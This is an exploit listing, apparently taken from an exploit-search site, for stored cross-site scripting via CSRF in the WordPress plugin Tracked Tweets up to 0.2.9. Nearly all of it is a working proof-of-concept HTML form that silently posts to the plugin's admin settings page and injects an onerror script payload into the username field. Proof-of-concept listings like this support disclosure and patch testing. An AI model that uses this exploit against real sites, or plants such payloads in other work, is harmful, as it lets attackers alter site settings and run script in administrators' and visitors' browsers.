Exploit for Tracked Tweets <= 0.2.9 - Stored Cross-Site Scripting via CSRF

Name: Exploit for Tracked Tweets <= 0.2.9 - Stored Cross-Site Scripting via CSRF
Rating: 5 (50 reviews)

2022-04-25 | CVSS 0.5

## https://sploitus.com/exploit?id=WPEX-ID:9478FD74-1729-41CA-ACB5-37EE92CEF649
<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=tracked-tweets/trackedtweets.php" method="POST">
      <input type="hidden" name="twitter_username" value='"><img src onerror=alert(/XSS/)>' />
      <input type="hidden" name="twitter_password" value="test" />
      <input type="hidden" name="ga_source" value="twitter" />
      <input type="hidden" name="ga_medium" value="social" />
      <input type="hidden" name="tweet_format" value="aa" />
      <input type="hidden" name="shortener" value="bitly" />
      <input type="hidden" name="savesettings" value="Save settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>